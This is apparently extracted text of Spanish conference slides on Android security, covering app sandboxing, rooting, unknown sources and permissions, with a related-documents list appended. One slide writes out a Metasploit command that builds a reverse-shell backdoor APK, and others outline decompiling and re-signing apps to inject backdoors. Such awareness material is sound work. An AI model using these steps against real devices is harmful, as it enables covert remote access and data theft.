Eduardo Sánchez





     

 

Conceptos previos sobre Android Principios de la Seguridad • Rooteando el teléfono • Fuentes desconocidas • Aceptación del usuario Ejemplo Backdoor en Android (Metasploit) Proceso de Compilación y Descompilación Ingeniería Inversa en Android - Herramientas Ejemplo Modificación Básica de APK (Caralibro) Ejemplo Obteniendo el código Java (Backdoor) Ejemplo Inyectando Backdoor (Cordoba CF) Conclusiones Agradecimientos @eduSatoe – Blog White Walkers of Hacking

2

Actividad

Es cada una de las pantallas de una aplicación en Android. Cada APK tiene una actividad principal. Estados

de una actividad

Son los diferentes momentos en los cuales se encuentra una actividad. ACTIVA – VISIBLE – PARADA - DESTRUIDA @eduSatoe – Blog White Walkers of Hacking

3

Máquina Virtual

Dalvik

Es una máquina virtual que se usa para los procesos en Android, cada proceso de una APK se ejecuta en una DVM diferente.

@eduSatoe – Blog White Walkers of Hacking

4







¿Puede el usuario matar procesos? El usuario NO tiene permiso para eliminar procesos de memoria. Android es el encargado de liberar memoria, sólo cuando otro proceso lo necesite. Metodología: Android mantiene en memoria todos los procesos que quepan, aunque no se estén ejecutando. ¿Cómo se libera memoria? Se crea una jerarquía de importancia para liberar la memoria. 1. 2. 3. 4. 5.

Procesos activos. Procesos visibles. Servicios activos. Procesos parados. Procesos vacíos.

@eduSatoe – Blog White Walkers of Hacking

5

1.

Se crea un usuario para cada APK que se instala en el sistema.

2.

Toda APK debe estar digitalmente por su autor.

3.

Se establece un modelo de permisos, donde cada acción comprometida que realice una APK debe estar registrada. @eduSatoe – Blog White Walkers of Hacking

firmada

6

Al tener un usuario para cada APK conseguimos restringir el acceso sobre los recursos del sistema. Cada usuario sólo tiene acceso a sus recursos, por tanto sólo él accede a su carpeta de aplicación. Pero todo esto se rompe cuando ROOTEAMOS el teléfono, ya que podemos acceder a cualquier carpeta.

Acceso con ROOT EXPLORER:

/data/data/com.whatsapp/databases/ Ficheros: msgstore,db y wa.db Uso de wforensics.

@eduSatoe – Blog White Walkers of Hacking

7

Toda APK debe estar firmada digitalmente por su autor, de manera que si alguien la modifica no podrá firmarla con el mismo certificado. Todas las aplicaciones de Google Play están firmadas digitalmente con certificados válidos. Pero todo esto se rompe cuando queremos instalar una APK descargada de algún repositorio de aplicaciones gratuitas (Aptoide o BlacMark) para ahorrarnos unos €. Es entonces cuando aceptamos la instalación de Aplicaciones con Fuentes Desconocidas .

@eduSatoe – Blog White Walkers of Hacking

8

Se establece un modelo de permisos, donde cada acción comprometida que realice una APK debe estar registrada. Así el usuario conoce los permisos que va a conceder una APK a la hora de su instalación. Pero todo esto se rompe cuando aceptamos cualquier permiso por tal de obtener la APK. EJEMPLOS PERMISOS Aplicación F

Aplicación B

@eduSatoe – Blog White Walkers of Hacking

9

Haciendo uso de Metasploit es muy fácil crear una backdoor para dispositivos Android.

msfpayload

android/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 R > backdoor.apk @eduSatoe – Blog White Walkers of Hacking

10

Es muy fácil obtener el código fuente de cualquier APK en Android, el proceso sería el siguiente. PROCESO DE COMPILACIÓN

PROCESO DE DESCOMPILACIÓN o INGENIERÍA INVERSA

@eduSatoe – Blog White Walkers of Hacking

11

Herramientas APKTOOL: herramienta de ingeniería inversa casi perfecta que te devuelve los ficheros originales de los que surgió una aplicación. DEX2JAR: conversión de ficheros .dex a .jar. JD-GUI: descompilador de clases java, que son librerías compiladas en bytecode (un reducido conjunto de instrucciones que aumenta la velocidad de ejecución del código en la máquina virtual) @eduSatoe – Blog White Walkers of Hacking

12

APKTOOL 1. Desempaquetar: apktool d caralibro.apk

2. Modificar código smali, archivos en res o manifiesto. 3. Compilamos: apktool b carpeta aplicacion.apk

4. Creamos almacen de firmas con keytool y firmamos la apk con jarsigner. @eduSatoe – Blog White Walkers of Hacking

13

@eduSatoe – Blog White Walkers of Hacking

14

Existen gran cantidad de Herramientas en la red para proteger nuestro terminales móviles: 

Antivirus



Aplicaciones de seguridad avanzadas Conan Mobile



Knox de Samsung

Control de permisos XPrivacy

App Ops

Privacy Guard 2.0

@eduSatoe – Blog White Walkers of Hacking

15

Recordad que la herramienta más potente de seguridad es:

EL USUARIO - Usar el sentido común -

@eduSatoe – Blog White Walkers of Hacking

16

GRACIAS A TODOS !!!! Twitter @eduSatoe Blog White Walkers of Hacking

17

Hack & Beers Vol2 - Seguridad Android.pdf

eduSatoe – Blog White Walkers of Hacking. Page 4 of 17. Hack & Beers Vol2 - Seguridad Android.pdf. Hack & Beers Vol2 - Seguridad Android.pdf. Open.

2MB Sizes 4 Downloads 229 Views

Recommend Documents

Hack & Beers Vol3 - SQLi y Backdoor para Script Kiddies.pdf ...
There was a problem previewing this document. Retrying... Download. Connect more apps... Try one of the apps below to open or edit this item. Hack & Beers ...

by emily beers - CrossFit
showcase their businesses. BY EMILY ... of care might spill over into other areas of your business— ... the Associated Press for 11 years—to offer some advice.

Vol2- issue 6.pdf
About 1.5 lakh jobs are expected to be created in the digital marketing space within a couple of. years as more companies tap the Internet and. the social media ...

by emily beers - CrossFit
of skill with words, videos and pictures, and these sites can .... photos that have helped increase CrossFit Mousetrap's social-media presence. ... Page 5 ...

vol2.pdf
de Stanford, David Filo y Jerry Yang, crearon un directorio de enlaces al que ... El servicio de conexión a Internet. Page 5 of 26. vol2.pdf. vol2.pdf. Open. Extract.

by emily beers - CrossFit
Lots of different information contradicted each ... Africa, information about it still hasn't sunk in with the masses of endurance ... with rowers and track-and-field athletes. Leading up .... Looking back on his career, Whitfield said he believes ma

La seguridad depredadora.pdf
from the accomplished task. • Facilitate student-to-student interactions and process learners. understanding. Whoops! There was a problem loading this page. Retrying... La seguridad depredadora.pdf. La seguridad depredadora.pdf. Open. Extract. Open

La seguridad depredadora.pdf
Retrying... Download. Connect more apps... Try one of the apps below to open or edit this item. La seguridad depredadora.pdf. La seguridad depredadora.pdf.

Electiva seguridad Informatica.pdf
Page 1 of 2. Fundación. Misión. Sucre. Colegio. Universitario. de Caracas. ELECTIVA: SEGURIDAD INFORMÁTICA. Intención. Curricular. La unidad curricular ...

ClearViews Newsletter Vol2.pdf
implementation of small. gestures that create. lasting loyalty. Check out the fabulous new GLASKLAR European. website: www.glasklar.com. There's lots great.

Liviu Rebreanu - Ion vol2.pdf
Let. them have their own interpretation or personal insights based. from the accomplished task. • Facilitate student-to-student interactions and process learners. understanding. Whoops! There was a problem loading this page. Retrying... Liviu Rebre

manual-sensores-motor-transmision-seguridad-confort-posicion ...
... apps below to open or edit this item. manual-sensores-motor-transmision-seguridad-confort- ... ion-velocidad-aceleracion-presion-caudal-gas-mas.pdf.

manual-prevencion-incendios-uso-extintores-seguridad-industrial.pdf ...
There was a problem previewing this document. Retrying... Download. Connect more apps... Try one of the apps below to open or edit this item.

Triptico-Seguridad-Acuicola.pdf
después de cada lavado y utilizar guantes de protec- ción para prevenir dermatitis y alergias. Usa la ropa de trabajo adecuada de cada estación, pro- tégete de ...

manual-operacion-mantenimiento-motoniveladoras-seguridad ...
... the apps below to open or edit this item. manual-operacion-mantenimiento-motoniveladoras-segur ... troles-intervalos-tecnicas-nivelacion-operadores.pdf.

Hack Madden Mobile With No Human Verification Hack ...
Neco Inc., of Denver, Colorado, provides 3D Computer Aided Design and support services ... Generator Madden Mobile Hack No Survey Kindle Fire Free Game ... Survey Live Free Game Generator Codes on Apple TV, Code Generator ...

Fifa 17 Hack Generator 799 @* Fifa 17 Hack Mobile Android
Live Free Game Generator Codes online, Free Game Generator Codes Fifa 17 Hack Coins Android CentralCode Generator Fifa 17. Free Coins No Verification ...

manual-seguridad-operacion-motoniveladora-16h-caterpillar.pdf ...
There was a problem previewing this document. Retrying... Download. Connect more apps... Try one of the apps below to open or edit this item.

Auditoría Esquema Nacional de Seguridad Cloud
Oct 16, 2017 - BDO certifica que los sistemas de información y los servicios reseñados, de. Google Ireland Limited. IE 6388047V. Gordon House, Barrow Street. Dublin 4, Ireland todos ellos de categoría ALTA han sido auditados y encontrados conforme

Auditoría Esquema Nacional de Seguridad Services
Oct 16, 2017 - Report of October 16, 2017 for the standard service it provides of: GOOGLE CLOUD PLATFORM SERVICES. Number of certificate: B0042.

Hoja de Seguridad Thinner Extrafino.pdf
Condiciones a evitar. No aplica. Page 3 of 8. Hoja de Seguridad Thinner Extrafino.pdf. Hoja de Seguridad Thinner Extrafino.pdf. Open. Extract. Open with.

SEGURIDAD INFORMATICA 2017 -HAWRYLUK-.pdf
Whoops! There was a problem loading more pages. Whoops! There was a problem previewing this document. Retrying... Download. Connect more apps.

material-cascos-seguridad-industrial.pdf
ESPECIAL ALTURAS. USO PREFERENTE: POCA LUZ. Page 3 of 19. material-cascos-seguridad-industrial.pdf. material-cascos-seguridad-industrial.pdf. Open.